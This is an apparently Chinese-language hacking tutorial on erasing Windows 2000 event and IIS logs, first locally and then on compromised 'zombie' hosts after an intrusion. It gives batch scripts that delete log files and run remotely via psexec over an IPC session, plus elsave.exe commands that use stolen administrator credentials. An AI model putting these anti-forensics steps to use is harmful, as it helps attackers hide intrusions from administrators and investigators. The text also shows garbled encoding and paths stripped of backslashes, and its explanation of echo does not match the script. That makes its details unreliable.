徹底清除本地和遠程系統日志文件
什么是日志文件?它是一些文件系統集合,依靠建立起的各種數據的日志文件而存在。在任何系統發(fā)生崩潰或需要重新啟動(dòng)時(shí),數據就遵從日志文件中的信息記錄原封不動(dòng)進(jìn)行恢復。日志對于系統安全的作用是顯而易見(jiàn)的,無(wú)論是網(wǎng)絡(luò )管理員還是 黑客都非常重視日志,一個(gè)有經(jīng)驗的管理員往往能夠迅速通過(guò)日志了解到系統的安全性能,而一個(gè)聰明的黑客會(huì )在入侵成功后迅速清除掉對自己不利的日志。無(wú)論是攻還是防,日志的重要性由此可見(jiàn)。下面我們就來(lái)簡(jiǎn)單討論一下日志文件的清除方法。
一、日志文件的位置
Windows 2000的系統日志文件有應用程序日志,安全日志、系統日志、DNS服務(wù)器日志等等,應用程序日志、安全日志、系統日志、DNS日志默認位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT
系統日志文件:%systemroot%system32configSysEvent.EVT
應用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理員很可能將這些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目錄。
二、清除自己電腦中的日志
如果你要清除自己電腦中的日志,可以用管理員的身份來(lái)登錄Windows,然后在“控制面板”中進(jìn)入“管理工具”,再雙擊里面的“事件查看器”。打開(kāi)后我們就可以在這里清除日志文件了,里面有應用程序、安全和系統日志文件。舉個(gè)例子,比方說(shuō)你想清除安全日志,可以右鍵點(diǎn)擊“安全日志”,在彈出的菜單中選擇“屬性”。接下來(lái)在彈出的對話(huà)框中,點(diǎn)擊下面“清除日志”按鈕就可以清除了,如果你想以后再來(lái)清除這些日志的話(huà),可以將“按需要改寫(xiě)尺寸”,這樣就可以在達到最大日志尺寸時(shí)進(jìn)行改寫(xiě)事件了,不會(huì )提示你清除日志。
三、清除遠程主機上的日志
大多數情況下,IIS的日志會(huì )忠實(shí)地記錄它接收到的任何請求(也有特殊的不被IIS記錄的攻擊),一個(gè)優(yōu)秀的系統管理員會(huì )利用這點(diǎn)來(lái)發(fā)現入侵的企圖,保護自己的系統。所以如果你是黑客,入侵系統成功后第一件事便是清除日志,擦去自己的形跡,這時(shí)可以用以下兩個(gè)辦法:一是自己編寫(xiě)批處理文件來(lái)解決,編寫(xiě)一個(gè)能清除日志的批處理非常簡(jiǎn)單,方法是:新建一個(gè)具有如下內容的批處理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的內容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執行時(shí)本行在命令行或DOS里面不顯示,另外del命令大家一定清楚吧?它是刪除文件命令。
接下來(lái)再新建一個(gè)批處理文件,內容如下:
@copy del.bat %1c$
@echo 向肉雞復制本機的del.bat……OK
@psexec %1 c:del.bat
@echo 在肉雞上運行del.bat,清除日志文件……OK
保存為clean.bat即可,假設已經(jīng)與肉雞進(jìn)行了IPC連接,然后在CMD下輸入:clean.bat 肉雞IP,即可清除肉雞上的日志文件。
清除日志的另外一個(gè)方法是借助第三方軟件,如著(zhù)名黑客軟件流光的開(kāi)發(fā)者黑客小榕的elsave.exe,就是是一款可以遠程清除系統日志、應用程序日志、安全日志的軟件,大家可以在網(wǎng)上下載到。elsave.exe使用起來(lái)很簡(jiǎn)單,首先利用獲得的管理員賬號與對方建立IPC會(huì )話(huà):net use ip pass /user: user,然后在命令行下執行如下命令:elsave -s ip -l application -C,這樣就刪除了安全日志。
評論